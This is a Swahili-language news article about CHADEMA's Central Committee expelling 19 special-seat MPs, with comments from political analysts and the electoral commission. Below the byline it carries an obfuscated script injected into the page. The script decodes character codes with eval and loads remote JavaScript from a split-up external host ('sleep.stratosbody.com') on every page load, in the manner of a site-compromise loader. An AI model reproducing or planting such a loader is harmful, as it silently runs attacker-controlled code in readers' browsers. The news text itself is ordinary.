Recent Comments

Sakata la CHADEMA na kina Mdee bado kitendawili

By Juma Issihaka Nov 29, 2020
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

WAKATI uongozi wa Chama cha Chadema ukitangaza kuwafukuza uwanachama Wabunge 19 wa Viti Maalumu, wenyewe wameapa kulipua bomu wakati wowote kuanzia sasa, huku baadhi ya wachambuzi wa siasa wakisema kitendo hicho ni cha kitoto na kinadhihirisha kuwa Demokrasia ndani ya chama ni sifuri.

Juzi Kamati Kuu ya Chadema iliketi kufanya uamuzi juu ya wanachama wake 19 walioapishwa kuwa wabunge wa viti maalumu na kuazimia kuwafuta uwanachama.

Maamuzi hayo ya Kamati Kuu ya Chadema yamewaibua wanachama hao, ambao wameapa kulipua bomu wakati wowote kuanzia sasa, kufuatia maamuzi yaliyofanywa dhidi yao.

Akizungumza jana mmoja wa wabunge hao, Sophia Mwakagenda, alisema ni ngumu kubainisha chochote wakati huo, kwani wanatarajia kufanya mkutano na Waandishi wa Habari leo.

Amesema mkutano huo utahusisha wabunge wote 19, hapo ndipo taarifa zote kuhusu wamepokeaje maamuzi na nini wanafikiri kufanya, zitatolewa.

“Siwezi kuzungumza lolote wakati huu, kwa sababu kesho (leo) tutafanya press conference nadhani kupitia hiyo, mtapata taarifa zote mnazozitaka,” amesema.

Alipoulizwa kuhusu nini kinatarajiwa kuzungumzwa kwenye mkutano huo, hakuwa tayari kubainisha kwa kile alichosema kuwa kila kitu kitafahamika wakati wa mkutano huo.

WACHAMBUZI WA SIASA

Mchambuzi wa Masuala ya Siasa na Diplomasia, Deus Kibamba, amesema anashangazwa na chama hicho, kuendeleza mjadala wa kitoto.

Amesema mjadala huo unadhihirisha kusinyaa kwa Demokrasia ndani ya Chadema, jambo ambalo limesababishwa na uongozi wake.

Kibamba, amesema mbaya zaidi mjadala huo ulihama kutoka katika mantiki ya maslahi ya wapigakura hadi maslahi ya viongozi na hapo ndipo demokrasia ilipopotea zaidi.

“Mjadala ulihamia katika kupambania maslahi ya viongozi na namna ya kujaza matumbo yao badala ya kupambania maslahi ya wapiga kura wao, na ikumbukwe kuwa kilichokuwa kinajadiliwa ni tuende ama tusiende bunge? Ni jambo la kitoto sana,” amesema.

Kwa mujibu wa Kibamba, kilichofanywa na Chadema ni kielelezo cha uhitaji wa kutafuta demokrasia nje ya vyama vya siasa kwani tayari imani ya wananchi ilishashuka kwa chama hicho.

Aliongeza kuwa kwa dalili zinazoonekana ni ishara ya kufifia kwa chama hicho na pengine kupoteza uhai kabla ya uchaguzi wa mwaka 2025.

Kwa upande wake Dk. Frank Tilly, Mchambuzi wa Siasa ambaye pia ni Mhadhiri wa Chuo Kikuu cha Dodoma  (UDOM), amesema uongozi wa chama hicho, unashindwa kuweka wazi tofauti zao lakini kwa tafsiri ya kawaida kkuna kila ishara ya kuwepo kwa mfarakano.

Amesema kumekosekana mawasiliano baina yao, hivyo kila mmoja anafanya anachoona kinafaa bila kumshirikisha mwingine, ndiyo sababu ya kuibuka kwa sintofahamu ya majina.

Pia amesema wakati mwingine wanasiasa hufanya matukio ya namna hiyo, ili kuzua taharuki kwa wananchi na si vinginevyo, hivyo ni muhimu  kwa mamlaka husika kuwa makini wakati zinafuatilia.

ILIVYOKUWA KWENYE KAMATI KUU

Uamuzi wa kufutwa uwanachama kwa wabunge hao 19, ulitangazwa saa nne usiku na Mwenyekiti wa Chadema, Freeman Mbowe baada ya kikao cha takriban saa 14, katika Ukumbi wa Bahari Beach jijini Dar es Salaam.

Tangua kuanza kwa mkutano ukumbini hapo kulionekana kuwekwa ulinzi mkali wa chama hicho, ambapo hawakuruhusu mtu yeyote asiye Mjumbe wa Kamati Kuu kuingia.

Hali hiyo ilikuwepo hata kwa baadhi ya Wanahabari ambapo ili kupata ruhusa ya kuingia ndani ilibidi mlinzi akawasiliane na uongozi ndani ndipo itoke ruhusa ya kuingia ama laa.

Kadhalika, hali ya kutoaminiana ilizuka ukumbini hapo, ambapo baadhi ya wanachama waligomewa pia kuingia ukumbini kwa madai kuwa si wajumbe wa kamati kuu, kuanzia hapo ndipo ugomvi ulianza.

Baadhi ya wanachama hao, walilazimisha kuingia ndani na kufanikiwa kuchungulia madirishani ili kujua kinachoendelea hali iliyosababisha wote kufurushwa katika eneo hilo.

Hatua hiyo inatajwa kufanywa kufuatia mkanganyiko uliopo ndani ya Chadema ambapo Katibu Mkuu John Mnyika, anadai hakuhusika kuwasilisha majina ya wabunge hao kwa Tume ya Taifa ya Uchaguzi (NEC) ili waapishwe kushika nafasi hizo.

Wakati Chadema ikidai hivyo, NEC juzi kupitia Mkurugenzi wa Uchaguzi Dk. Wilson Mahela, imekata mzizi wa fitina kwa kubainisha kuwa majina hayo, iliyapokea kutoka  Ofisi ya Katibu Mkuu wa chama hicho.

Kwa mujibu wa Mbowe, sababu ya kufutwa uwanachama kwa wabunge hao, ni kukiuka msimamo wa chama juu ya kugomea matokeo ya uchaguzi Mkuu uliofanyika Oktoba 28, mwaka huu.

By Juma Issihaka

Juma Issihaka, is the senior journalist with more than five years of experience on the profession. He mostly base on Politics reporting, Environment reporting as well as social affairs.